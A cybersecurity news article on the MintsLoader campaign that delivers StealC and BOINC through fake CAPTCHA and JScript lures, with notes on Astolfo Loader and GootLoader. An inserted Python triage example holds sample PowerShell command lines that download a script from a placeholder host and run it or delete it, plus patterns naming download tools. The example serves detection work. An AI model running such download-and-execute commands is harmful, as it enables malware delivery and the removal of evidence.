    MintsLoader Deploys StealC Malware and BOINC in Sophisticated Targeted Attacks

    Cybersecurity experts have uncovered a targeted campaign that uses a PowerShell-based malware loader, MintsLoader, to deliver payloads including the StealC information stealer and BOINC, a legitimate distributed computing platform.

    According to a detailed analysis by cybersecurity firm eSentire, MintsLoader is being propagated through spam emails containing links to KongTuke/ClickFix landing pages or obfuscated JScript files. These campaigns, detected in early January 2025, have been observed targeting the electricity, oil and gas, and legal services sectors across the U.S. and Europe.

    KongTuke and ClickFix Tactics

    The campaign coincides with a surge in malicious operations employing fake CAPTCHA verification pages to lure users into executing PowerShell scripts, bypassing standard security checks. The technique, known as KongTuke or ClickFix, involves manipulated scripts that trick victims into pasting malicious code from their clipboard into a Windows Run command.

    Palo Alto Networks Unit 42 revealed similar tactics in an attack that distributed BOINC, stating, “KongTuke utilizes fake ‘verify you are human’ prompts to inject malicious PowerShell code into the user’s clipboard while providing explicit instructions for execution.”

    Attack Chain Analysis

    The MintsLoader campaign begins with spam emails linking to downloads of an obfuscated JScript file. When executed, the script launches a PowerShell command that uses curl to download and run MintsLoader. The script then deletes itself to remove forensic evidence.

    Alternative delivery methods include redirecting victims to ClickFix-style pages, prompting them to run MintsLoader via the Windows Run prompt.

    Once active, MintsLoader contacts a command-and-control (C2) server to fetch interim PowerShell payloads. These payloads perform sandbox evasion checks and use a Domain Generation Algorithm (DGA) that derives the C2 domain from the current date, so the contacted domain changes daily.

    The final stage involves deploying StealC, a malware-as-a-service (MaaS) offering that has been active since 2023. Derived from the Arkei malware, StealC avoids infecting machines in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan, reflecting deliberate targeting patterns.
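    As an added illustration of how a defender might triage the two delivery paths just described (this is example code, not from eSentire's report), the following Python scores constructed process-creation events for PowerShell launched from the Run prompt or from a script host, a curl-style download cradle, and self-deletion of the launching script. The event fields, sample command lines, domain and rule names are assumptions made for the example.

```python
import re
from dataclasses import dataclass
@dataclass
class ProcEvent:
    parent: str    # parent process image
    image: str     # created process image
    cmdline: str   # full command line

# Constructed sample telemetry for illustration, not real logs from the campaign.
SAMPLE_EVENTS = [
    # ClickFix path: PowerShell launched from the Run prompt (parent explorer.exe)
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -c "curl http://loader.example.invalid/m -o $env:TEMP\\m.ps1; & $env:TEMP\\m.ps1"'),
    # JScript path: wscript spawns PowerShell, which downloads and then deletes its own script
    ProcEvent("wscript.exe", "powershell.exe",
              'powershell -c "curl http://loader.example.invalid/m | iex; Remove-Item $PSCommandPath"'),
    # Benign interactive use from the Run prompt
    ProcEvent("explorer.exe", "powershell.exe", "powershell -c Get-Date"),
    # Unrelated system process
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# Parent images that correspond to the two delivery paths described in the article.
PARENT_RULES = {"explorer.exe": "run_prompt_parent",
                "wscript.exe": "script_host_parent", "cscript.exe": "script_host_parent"}
DOWNLOAD_CRADLE = re.compile(r"\b(curl|wget|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
SELF_DELETE = re.compile(r"\b(remove-item|del|rm)\b.*\$(pscommandpath|myinvocation)", re.I)
def rules_for(ev: ProcEvent) -> list[str]:
    """Return the names of the rules a single PowerShell process-creation event matches."""
    hits = []
    if ev.image.lower() != "powershell.exe":
        return hits
    parent_rule = PARENT_RULES.get(ev.parent.lower())
    if parent_rule:
        hits.append(parent_rule)
    if DOWNLOAD_CRADLE.search(ev.cmdline):
        hits.append("download_cradle")
    if SELF_DELETE.search(ev.cmdline):
        hits.append("self_delete")
    return hits

def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Flag events where a download cradle co-occurs with at least one context rule."""
    flagged = {}
    for i, ev in enumerate(events):
        hits = rules_for(ev)
        if "download_cradle" in hits and len(hits) >= 2:
            flagged[i] = hits
    return flagged
```

Requiring the cradle to co-occur with a context rule keeps ordinary interactive PowerShell from the Run prompt out of the alert queue.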

    JinxLoader Evolves into Astolfo Loader

    The rise of MintsLoader parallels developments in other malware families, such as the emergence of Astolfo Loader (Jinx V3). Initially known as JinxLoader, this malware was re-engineered in C++ for performance improvements after its source code was sold to two separate buyers: Delfin and AstolfoLoader.

    According to BlackBerry, “While Delfin retains the original Go-compiled JinxLoader V2, AstolfoLoader has opted for a rebranded version in C++, showcasing how malware tools evolve quickly and remain widely accessible on hacking forums.”

    GootLoader: Sophisticated SEO Poisoning

    Further complicating the cybersecurity landscape, GootLoader campaigns continue to weaponize search engine optimization (SEO) poisoning. These attacks redirect victims searching for legal documents to compromised WordPress sites hosting malicious downloads disguised as legitimate files.

    Sophos researchers noted that GootLoader operators dynamically load malicious content from external servers—dubbed the “mothership”—into infected WordPress sites. These operations utilize IP-based geofencing and restrict victim access to once every 24 hours to avoid detection.

    “The obfuscation is so intricate that even site owners are often unaware their WordPress sites have been compromised,” noted security researcher Gabor Szappanos.

    Mitigation and Awareness

    The MintsLoader and GootLoader campaigns underscore the need for heightened vigilance in cybersecurity, particularly in critical industries. Users are urged to avoid executing unverified scripts, scrutinize CAPTCHA pages, and implement strong email filtering to prevent exposure to these evolving threats.
